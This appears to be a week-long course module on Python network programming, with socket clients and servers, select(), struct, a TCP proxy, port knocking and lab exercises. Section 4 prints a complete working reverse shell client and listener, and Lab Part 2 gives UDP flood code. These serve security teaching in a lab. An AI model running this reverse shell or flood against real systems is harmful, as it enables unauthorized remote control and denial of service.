Week Overview
This week dives into network programming—the foundation of offensive and defensive security tools. You'll learn to:
- Understand TCP/IP at the socket level (beyond high-level libraries)
- Build custom network clients and servers
- Implement reverse shells, proxies, and network utilities
- Handle network errors and timeouts gracefully
- Use non-blocking sockets for concurrent connections
Section 1: OSI Model & Network Fundamentals
Quick OSI Review (Security Perspective)
From CSY104, you learned the 7-layer OSI model. For network programming in Python, we primarily work at:
- Layer 3 (Network): IP addresses, routing (we'll work with IP packets)
- Layer 4 (Transport): TCP/UDP ports (main focus this week)
- Layer 7 (Application): HTTP, SSH, FTP (next week)
TCP vs UDP: Security Implications
TCP (Transmission Control Protocol)
- ✅ Connection-oriented (3-way handshake)
- ✅ Reliable delivery (packets acknowledged)
- ✅ Ordered delivery
- ⚠️ Slower (overhead from reliability)
- Security Use: Reverse shells, C2 channels, reliable data exfiltration
UDP (User Datagram Protocol)
- ✅ Connectionless (no handshake)
- ❌ Unreliable (packets may be lost)
- ❌ Unordered delivery
- ✅ Faster (low overhead)
- Security Use: DoS attacks, fast scanning, DNS tunneling, covert channels
Port Numbers: The Security Landscape
#!/usr/bin/env python3
"""
Common ports from a security perspective
"""
# Well-known ports (0-1023) - require root/admin privileges to bind
COMMON_PORTS = {
20: 'FTP Data',
21: 'FTP Control',
22: 'SSH', # Secure Shell - common attack target
23: 'Telnet', # Unencrypted - legacy, avoid
25: 'SMTP', # Email - phishing, spam relay testing
53: 'DNS', # Domain Name System - tunneling, exfiltration
80: 'HTTP', # Web - most tested port
110: 'POP3', # Email retrieval
143: 'IMAP', # Email retrieval
443: 'HTTPS', # Encrypted web - certificate analysis
445: 'SMB', # Windows file sharing - EternalBlue, ransomware
3306: 'MySQL', # Database - SQL injection testing
3389: 'RDP', # Remote Desktop - brute force target
5432: 'PostgreSQL', # Database
5900: 'VNC', # Remote desktop - weak auth common
8080: 'HTTP-Alt', # Alternative web port
}
# Registered ports (1024-49151) - user applications
SECURITY_TOOL_PORTS = {
4444: 'Metasploit Default Payload',
8000: 'Python SimpleHTTPServer',
8443: 'HTTPS Alternative',
9001: 'Tor/HSQL/Supervisord',
}
# Dynamic/Private ports (49152-65535) - ephemeral client ports
# Used by OS for outgoing connections
Section 2: Socket Programming Fundamentals
Creating Sockets
Python's socket module provides low-level network access:
#!/usr/bin/env python3
"""
Socket creation and basic operations
"""
import socket
# Create a TCP socket (IPv4)
tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Parameters explained:
# - AF_INET: IPv4 address family (use AF_INET6 for IPv6)
# - SOCK_STREAM: TCP socket (connection-oriented)
# Create a UDP socket
udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Parameters:
# - SOCK_DGRAM: UDP socket (datagram, connectionless)
# Socket options (important for security tools)
tcp_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# SO_REUSEADDR: Allow reusing address/port immediately after close
# Critical for servers that restart frequently
# Set timeout (prevents hanging on dead connections)
tcp_socket.settimeout(5.0) # 5 second timeout
# Get socket information
print(f"Socket family: {tcp_socket.family}") # AF_INET
print(f"Socket type: {tcp_socket.type}") # SOCK_STREAM
# ALWAYS close sockets when done
tcp_socket.close()
udp_socket.close()
# Better: Use context managers (auto-close)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
# Use socket here
pass
# Socket automatically closed
TCP Client
Basic TCP client connects to a server, sends data, receives response:
#!/usr/bin/env python3
"""
Simple TCP client - connects to server and exchanges data
"""
import socket
def tcp_client(target_host: str, target_port: int, message: str) -> str | None:
"""
Send message to TCP server, return response.
Args:
target_host: Target IP or hostname
target_port: Target port
message: Message to send
Returns:
Server response or None on error
"""
try:
# Create socket
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Set timeout to avoid hanging
client.settimeout(5)
# Connect to server (3-way handshake happens here)
print(f"[*] Connecting to {target_host}:{target_port}...")
client.connect((target_host, target_port))
print(f"[*] Connected! Sending: {message}")
# Send data (encode string to bytes)
client.send(message.encode('utf-8'))
# Receive response (max 4096 bytes)
response = client.recv(4096)
# Decode bytes to string
response_str = response.decode('utf-8', errors='ignore')
print(f"[*] Received: {response_str}")
# Close connection
client.close()
return response_str
except socket.timeout:
print(f"[!] Connection timeout to {target_host}:{target_port}")
return None
except socket.error as e:
print(f"[!] Socket error: {e}")
return None
except Exception as e:
print(f"[!] Error: {e}")
return None
# Usage
if __name__ == '__main__':
# Test with banner grabbing
banner = tcp_client('scanme.nmap.org', 80, 'HEAD / HTTP/1.0\r\n\r\n')
if banner:
print(f"\n=== Banner ===\n{banner}")
TCP Server
TCP server listens for incoming connections and handles clients:
#!/usr/bin/env python3
"""
Simple TCP server - listens for connections and echoes data back
"""
import socket
import threading
def handle_client(client_socket: socket.socket, address: tuple) -> None:
"""
Handle individual client connection.
Args:
client_socket: Connected client socket
address: (ip, port) tuple of client
"""
print(f"[*] Accepted connection from {address[0]}:{address[1]}")
try:
# Receive data from client
data = client_socket.recv(4096)
if data:
message = data.decode('utf-8', errors='ignore')
print(f"[*] Received: {message}")
# Echo data back to client
response = f"You sent: {message}"
client_socket.send(response.encode('utf-8'))
except Exception as e:
print(f"[!] Error handling client: {e}")
finally:
# Always close client socket
client_socket.close()
print(f"[*] Connection closed: {address[0]}:{address[1]}")
def tcp_server(bind_ip: str, bind_port: int) -> None:
"""
Start TCP server and listen for connections.
Args:
bind_ip: IP to bind to (0.0.0.0 = all interfaces)
bind_port: Port to listen on
"""
# Create server socket
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Reuse address (important for quick restarts)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Bind to address and port
server.bind((bind_ip, bind_port))
# Listen for connections (backlog queue = 5)
server.listen(5)
print(f"[*] Listening on {bind_ip}:{bind_port}")
try:
while True:
# Accept incoming connection (blocks until client connects)
client_socket, address = server.accept()
# Handle client in separate thread (allows multiple clients)
client_thread = threading.Thread(
target=handle_client,
args=(client_socket, address)
)
client_thread.start()
except KeyboardInterrupt:
print("\n[!] Server shutting down...")
finally:
server.close()
# Usage
if __name__ == '__main__':
# Listen on all interfaces, port 9999
tcp_server('0.0.0.0', 9999)
UDP Client & Server
UDP is connectionless, simpler but unreliable:
#!/usr/bin/env python3
"""
UDP client and server examples
"""
import socket
# UDP CLIENT
def udp_client(target_host: str, target_port: int, message: str) -> None:
"""
Send UDP datagram to target.
"""
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# No connect() needed - just send
client.sendto(message.encode('utf-8'), (target_host, target_port))
# Try to receive response (may timeout)
client.settimeout(2)
data, server = client.recvfrom(4096)
print(f"[*] Received from {server}: {data.decode('utf-8', errors='ignore')}")
except socket.timeout:
print("[!] No response received")
finally:
client.close()
# UDP SERVER
def udp_server(bind_ip: str, bind_port: int) -> None:
"""
Start UDP server.
"""
server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server.bind((bind_ip, bind_port))
print(f"[*] Listening on {bind_ip}:{bind_port} (UDP)")
try:
while True:
# Receive data and client address
data, address = server.recvfrom(4096)
print(f"[*] Received from {address[0]}:{address[1]}: {data.decode('utf-8', errors='ignore')}")
# Send response back
response = b"UDP ACK"
server.sendto(response, address)
except KeyboardInterrupt:
print("\n[!] Server shutting down...")
finally:
server.close()
# Usage
if __name__ == '__main__':
import sys
if len(sys.argv) < 2:
print("Usage: python script.py [client|server]")
sys.exit(1)
mode = sys.argv[1]
if mode == 'server':
udp_server('0.0.0.0', 9999)
elif mode == 'client':
udp_client('127.0.0.1', 9999, 'Hello UDP!')
else:
print("Invalid mode. Use 'client' or 'server'")
Section 3: Advanced Socket Techniques
Non-Blocking Sockets & select()
Non-blocking sockets allow handling multiple connections efficiently without threading:
#!/usr/bin/env python3
"""
Non-blocking sockets with select() for concurrent handling
"""
import socket
import select
def non_blocking_server(bind_ip: str, bind_port: int) -> None:
"""
TCP server using select() to handle multiple clients without threads.
"""
# Create server socket
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind((bind_ip, bind_port))
server.listen(5)
# Make server non-blocking
server.setblocking(False)
print(f"[*] Non-blocking server on {bind_ip}:{bind_port}")
# List of sockets to monitor
sockets_list = [server]
# Dict to store client data
clients = {}
try:
while True:
# Wait for socket to be ready (read, write, error)
# Timeout = 1 second (check for new activity every second)
read_sockets, write_sockets, error_sockets = select.select(
sockets_list, # Read list
[], # Write list (empty - not writing)
sockets_list, # Error list
1.0 # Timeout
)
# Handle readable sockets
for notified_socket in read_sockets:
# New connection
if notified_socket == server:
client_socket, client_address = server.accept()
client_socket.setblocking(False)
sockets_list.append(client_socket)
clients[client_socket] = client_address
print(f"[*] New connection: {client_address[0]}:{client_address[1]}")
# Data from existing client
else:
try:
data = notified_socket.recv(4096)
if data:
message = data.decode('utf-8', errors='ignore')
address = clients[notified_socket]
print(f"[*] From {address[0]}:{address[1]}: {message}")
# Echo back
notified_socket.send(f"Echo: {message}".encode('utf-8'))
else:
# Empty data = client disconnected
raise Exception("Client disconnected")
except:
# Remove client
address = clients[notified_socket]
print(f"[*] Connection closed: {address[0]}:{address[1]}")
sockets_list.remove(notified_socket)
del clients[notified_socket]
notified_socket.close()
# Handle socket errors
for notified_socket in error_sockets:
sockets_list.remove(notified_socket)
if notified_socket in clients:
del clients[notified_socket]
notified_socket.close()
except KeyboardInterrupt:
print("\n[!] Shutting down...")
finally:
for sock in sockets_list:
sock.close()
if __name__ == '__main__':
non_blocking_server('0.0.0.0', 9999)
Binary Data with struct
For network protocols, you often need to pack/unpack binary data:
#!/usr/bin/env python3
"""
Binary data handling with struct module
"""
import socket
import struct
# Pack data into binary format
def pack_message(msg_type: int, length: int, data: bytes) -> bytes:
"""
Pack message into binary format:
- 2 bytes: message type (unsigned short)
- 4 bytes: data length (unsigned int)
- N bytes: data
Format string:
- '!': Network byte order (big-endian)
- 'H': Unsigned short (2 bytes)
- 'I': Unsigned int (4 bytes)
"""
header = struct.pack('!HI', msg_type, length)
return header + data
# Unpack binary data
def unpack_message(binary_data: bytes) -> tuple:
"""
Unpack binary message.
Returns:
(msg_type, length, data) tuple
"""
# Unpack header (6 bytes total: 2 + 4)
header = binary_data[:6]
msg_type, length = struct.unpack('!HI', header)
# Extract data
data = binary_data[6:6+length]
return msg_type, length, data
# Example: Send binary message
def send_binary_message(host: str, port: int) -> None:
"""
Send binary message to server.
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
# Create message
msg_type = 1 # Command message
data = b"HELLO_SERVER"
length = len(data)
# Pack and send
message = pack_message(msg_type, length, data)
sock.send(message)
# Receive response
response = sock.recv(1024)
msg_type, length, data = unpack_message(response)
print(f"Received type {msg_type}: {data.decode('utf-8')}")
sock.close()
# Common struct format codes
"""
Format | C Type | Python Type | Size (bytes)
-------|------------------|-------------|-------------
! | Network order | (big-endian)| N/A
b | signed char | int | 1
B | unsigned char | int | 1
h | short | int | 2
H | unsigned short | int | 2
i | int | int | 4
I | unsigned int | int | 4
q | long long | int | 8
Q | unsigned long | int | 8
f | float | float | 4
d | double | float | 8
s | char[] | bytes | varies
"""
Error Handling Best Practices
#!/usr/bin/env python3
"""
Robust network error handling
"""
import socket
import errno
def robust_tcp_client(host: str, port: int) -> None:
"""
TCP client with comprehensive error handling.
"""
sock = None
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
# Connect
sock.connect((host, port))
# Send data
sock.sendall(b"GET / HTTP/1.0\r\n\r\n")
# Receive data
data = sock.recv(4096)
print(data.decode('utf-8', errors='ignore'))
except socket.timeout:
print(f"[!] Connection timeout to {host}:{port}")
except socket.gaierror as e:
# DNS resolution error
print(f"[!] DNS resolution failed for {host}: {e}")
except ConnectionRefusedError:
print(f"[!] Connection refused by {host}:{port} (port closed)")
except ConnectionResetError:
print(f"[!] Connection reset by peer")
except BrokenPipeError:
print(f"[!] Broken pipe (remote end closed)")
except OSError as e:
if e.errno == errno.ENETUNREACH:
print(f"[!] Network unreachable")
elif e.errno == errno.EHOSTUNREACH:
print(f"[!] Host unreachable")
else:
print(f"[!] OS error: {e}")
except Exception as e:
print(f"[!] Unexpected error: {e}")
finally:
if sock:
sock.close()
Section 4: Security Applications
Reverse Shell (Educational)
⚠️ WARNING: This is for understanding attack/defense only. Unauthorized use is illegal.
#!/usr/bin/env python3
"""
Simple reverse shell - FOR EDUCATION ONLY
Demonstrates how attackers maintain access to compromised systems
"""
import socket
import subprocess
import os
def reverse_shell_client(server_ip: str, server_port: int) -> None:
"""
Connect back to attacker's server and provide shell access.
This is how malware/backdoors work. Understanding this helps
defenders detect and prevent such attacks.
"""
try:
# Connect to attacker's listener
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((server_ip, server_port))
# Send banner
sock.send(b"[*] Reverse shell connected\n")
while True:
# Receive command from attacker
command = sock.recv(4096).decode('utf-8').strip()
if not command:
break
if command.lower() == 'exit':
break
# Execute command
try:
# Run command and capture output
output = subprocess.check_output(
command,
shell=True,
stderr=subprocess.STDOUT,
stdin=subprocess.DEVNULL
)
sock.send(output)
except Exception as e:
error_msg = f"Error: {str(e)}\n"
sock.send(error_msg.encode('utf-8'))
# Send prompt
sock.send(b"\n>>> ")
except Exception as e:
pass
finally:
sock.close()
def reverse_shell_listener(bind_ip: str, bind_port: int) -> None:
"""
Attacker's listener - waits for victim to connect back.
"""
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind((bind_ip, bind_port))
server.listen(1)
print(f"[*] Listening on {bind_ip}:{bind_port}")
print("[*] Waiting for reverse shell connection...")
client, address = server.accept()
print(f"[*] Connection from {address[0]}:{address[1]}")
try:
while True:
# Receive banner/output
data = client.recv(4096)
if not data:
break
print(data.decode('utf-8', errors='ignore'), end='')
# Send command
command = input()
if command.lower() == 'exit':
client.send(b'exit\n')
break
client.send(command.encode('utf-8') + b'\n')
except KeyboardInterrupt:
print("\n[!] Exiting...")
finally:
client.close()
server.close()
# USAGE (in isolated lab only):
# Terminal 1 (attacker): python script.py listener
# Terminal 2 (victim): python script.py client 127.0.0.1 4444
if __name__ == '__main__':
import sys
if len(sys.argv) < 2:
print("Usage:")
print(" Listener: python script.py listener")
print(" Client: python script.py client ")
sys.exit(1)
mode = sys.argv[1]
if mode == 'listener':
reverse_shell_listener('0.0.0.0', 4444)
elif mode == 'client' and len(sys.argv) == 4:
reverse_shell_client(sys.argv[2], int(sys.argv[3]))
else:
print("Invalid arguments")
Network Proxy
Simple TCP proxy for traffic inspection/modification:
#!/usr/bin/env python3
"""
Simple TCP proxy - intercept and inspect network traffic
Useful for analyzing protocols, debugging, MITM testing
"""
import socket
import threading
def proxy_handler(client_socket, remote_host, remote_port):
"""
Handle proxy connection - forward traffic both ways.
"""
# Connect to remote server
remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
remote_socket.connect((remote_host, remote_port))
print(f"[*] Connected to {remote_host}:{remote_port}")
# Start forwarding in both directions
# Client -> Remote
def forward_to_remote():
while True:
data = client_socket.recv(4096)
if not data:
break
print(f"[→] Client sent {len(data)} bytes")
# Optionally inspect/modify data here
remote_socket.send(data)
# Remote -> Client
def forward_to_client():
while True:
data = remote_socket.recv(4096)
if not data:
break
print(f"[←] Server sent {len(data)} bytes")
# Optionally inspect/modify data here
client_socket.send(data)
# Run both directions concurrently
t1 = threading.Thread(target=forward_to_remote)
t2 = threading.Thread(target=forward_to_client)
t1.start()
t2.start()
t1.join()
t2.join()
except Exception as e:
print(f"[!] Proxy error: {e}")
finally:
client_socket.close()
remote_socket.close()
def tcp_proxy(local_host, local_port, remote_host, remote_port):
"""
Start TCP proxy server.
Args:
local_host: Interface to bind to
local_port: Port to listen on
remote_host: Target server IP
remote_port: Target server port
"""
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind((local_host, local_port))
server.listen(5)
print(f"[*] Proxy listening on {local_host}:{local_port}")
print(f"[*] Forwarding to {remote_host}:{remote_port}")
try:
while True:
client_socket, addr = server.accept()
print(f"[*] Connection from {addr[0]}:{addr[1]}")
# Handle in separate thread
proxy_thread = threading.Thread(
target=proxy_handler,
args=(client_socket, remote_host, remote_port)
)
proxy_thread.start()
except KeyboardInterrupt:
print("\n[!] Shutting down proxy...")
finally:
server.close()
# Usage: python proxy.py
# Then connect to localhost:8080, traffic forwarded to target
if __name__ == '__main__':
tcp_proxy('127.0.0.1', 8080, 'example.com', 80)
Lab 5: Network Programming
Part 1: TCP Reverse Shell (Client/Server) (45 minutes)
Objective: Build a functional reverse shell to understand how attackers maintain access to compromised systems.
Requirements:
- Create
reverse_shell.pywith two modes:- Listener mode: Waits for victim to connect, provides command prompt
- Client mode: Connects back to listener, executes commands
- Features:
- Execute shell commands and return output
- Handle errors gracefully (command not found, etc.)
- Reconnect on disconnect (persistence)
- Clean exit command
- Test in local VM only (two terminal windows)
Success Criteria:
- Listener accepts connection from client
- Can execute commands like
ls,whoami,pwd - Output returned to listener correctly
- Exit command closes connection cleanly
Hint: Command Execution
import subprocess
# Execute command and capture output
try:
output = subprocess.check_output(
command,
shell=True,
stderr=subprocess.STDOUT, # Capture errors too
timeout=30 # Kill after 30 seconds
)
return output
except subprocess.TimeoutExpired:
return b"Error: Command timeout\n"
except Exception as e:
return f"Error: {str(e)}\n".encode('utf-8')
Part 2: UDP Flood Tester (40 minutes)
Objective: Build a UDP flood tool to understand DoS attacks (for defensive knowledge only).
Requirements:
- Create
udp_flood.pythat:- Accepts target IP, port, and packet count as arguments
- Sends rapid UDP packets to target
- Displays packets/second rate
- Includes rate limiting option (to avoid accidental DoS)
- Add monitoring mode:
- Listen for UDP flood traffic
- Count packets received per second
- Alert when threshold exceeded
- ⚠️ Test ONLY against your own systems in isolated lab
Success Criteria:
- Send at least 100 UDP packets/second
- Display statistics (packets sent, bytes sent, duration)
- Monitoring mode detects flood
- Rate limiting works correctly
Hint: High-Speed UDP Sending
import socket
import time
def udp_flood(target_ip, target_port, packet_count, rate_limit=None):
"""
Send UDP flood to target.
Args:
target_ip: Target IP
target_port: Target port
packet_count: Number of packets to send
rate_limit: Max packets/second (None = unlimited)
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Random or fixed payload
payload = b"X" * 1024 # 1KB packet
start_time = time.time()
packets_sent = 0
for i in range(packet_count):
sock.sendto(payload, (target_ip, target_port))
packets_sent += 1
# Rate limiting
if rate_limit:
time.sleep(1.0 / rate_limit)
# Progress every 100 packets
if packets_sent % 100 == 0:
elapsed = time.time() - start_time
pps = packets_sent / elapsed
print(f"[*] Sent {packets_sent} packets ({pps:.2f} pps)")
elapsed = time.time() - start_time
print(f"\n[*] Flood complete: {packets_sent} packets in {elapsed:.2f}s")
print(f"[*] Average rate: {packets_sent / elapsed:.2f} pps")
sock.close()
Part 3: Simple Network Proxy (35 minutes)
Objective: Build a TCP proxy to intercept and inspect network traffic.
Requirements:
- Create
tcp_proxy.pythat:- Accepts local port and remote host:port as arguments
- Forwards all traffic between client and remote server
- Logs all traffic (hex dump or printable text)
- Optionally modifies traffic (e.g., replace strings)
- Test with HTTP traffic (proxy HTTP requests to a website)
- Demonstrate traffic inspection (print requests/responses)
Success Criteria:
- Proxy successfully forwards traffic
- Log shows client requests and server responses
- Can intercept HTTP GET/POST requests
- Optional: Modify traffic in transit
Hint: Hex Dump Function
def hexdump(data, length=16):
"""
Print hex dump of binary data.
"""
result = []
for i in range(0, len(data), length):
chunk = data[i:i+length]
# Hex representation
hex_str = ' '.join(f'{b:02x}' for b in chunk)
# ASCII representation (replace non-printable with '.')
ascii_str = ''.join(chr(b) if 32 <= b < 127 else '.' for b in chunk)
result.append(f'{i:04x} {hex_str:<{length*3}} {ascii_str}')
return '\n'.join(result)
# Usage
data = b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"
print(hexdump(data))
Part 4: Port Knocking Implementation (30 minutes)
Objective: Implement port knocking - a security technique where ports open only after a sequence of connection attempts.
Requirements:
- Create
port_knock_server.py:- Listens for connection attempts on multiple ports
- Requires correct sequence (e.g., knock 1000, 2000, 3000 in order)
- Opens protected port (e.g., SSH on 22) only after correct sequence
- Resets sequence on timeout or wrong port
- Create
port_knock_client.py:- Sends knock sequence to server
- Waits between knocks
- Connects to protected port after sequence
Success Criteria:
- Server detects correct knock sequence
- Protected port opens only after valid sequence
- Sequence resets on timeout or error
- Client successfully connects after knocking
Hint: Sequence Tracking
import time
class PortKnockServer:
def __init__(self, sequence):
"""
Args:
sequence: List of ports in correct order (e.g., [1000, 2000, 3000])
"""
self.sequence = sequence
self.client_states = {} # {ip: (current_step, last_knock_time)}
self.timeout = 10 # seconds
def process_knock(self, client_ip, port):
"""
Process knock attempt from client.
Returns:
True if sequence complete, False otherwise
"""
now = time.time()
# Get client state
if client_ip in self.client_states:
step, last_time = self.client_states[client_ip]
# Check timeout
if now - last_time > self.timeout:
print(f"[!] {client_ip}: Sequence timeout, resetting")
step = 0
else:
step = 0
# Check if port matches expected sequence
if port == self.sequence[step]:
step += 1
print(f"[*] {client_ip}: Correct knock {step}/{len(self.sequence)}")
# Sequence complete?
if step == len(self.sequence):
print(f"[✓] {client_ip}: Sequence complete! Opening protected port")
del self.client_states[client_ip]
return True
# Update state
self.client_states[client_ip] = (step, now)
else:
print(f"[!] {client_ip}: Wrong port {port}, expected {self.sequence[step]}")
if client_ip in self.client_states:
del self.client_states[client_ip]
return False
📤 Deliverables:
reverse_shell.py- Reverse shell client and listenerudp_flood.py- UDP flood tool with monitoringtcp_proxy.py- Network traffic proxy with loggingport_knock_server.py+port_knock_client.py- Port knocking implementation- Screenshots of each tool working
Additional Resources
Python Documentation
- socket - Low-level networking interface
- select - I/O multiplexing
- struct - Binary data packing
- subprocess - Process execution
Network Security Resources
- Black Hat: Python for Pentesters
- Empire - PowerShell/Python C2 Framework
- Metasploit Unleashed (socket concepts)
Practice Challenges
- Build a multi-client chat server (like IRC)
- Create a simple port scanner using raw sockets
- Implement a basic VPN tunnel (encrypt traffic between client/server)
- Build a DNS tunnel for data exfiltration (educational)
Key Takeaways
- ✅ Sockets are the foundation of all network communication
- ✅ TCP provides reliable, ordered delivery (use for critical data)
- ✅ UDP is fast but unreliable (use for speed-critical applications)
- ✅ Always handle network errors and timeouts gracefully
- ✅ Non-blocking sockets with
select()enable concurrent handling - ✅
structmodule is essential for binary protocol work - ✅ Reverse shells are common malware/backdoor mechanisms
- ✅ Understanding attack tools helps build better defenses
- ⚠️ Never use offensive tools without authorization
Week 05 Quiz
Test your understanding of network programming basics in Python.
Format: 10 multiple-choice questions. Passing score: 70%. Time: Untimed.
Take Quiz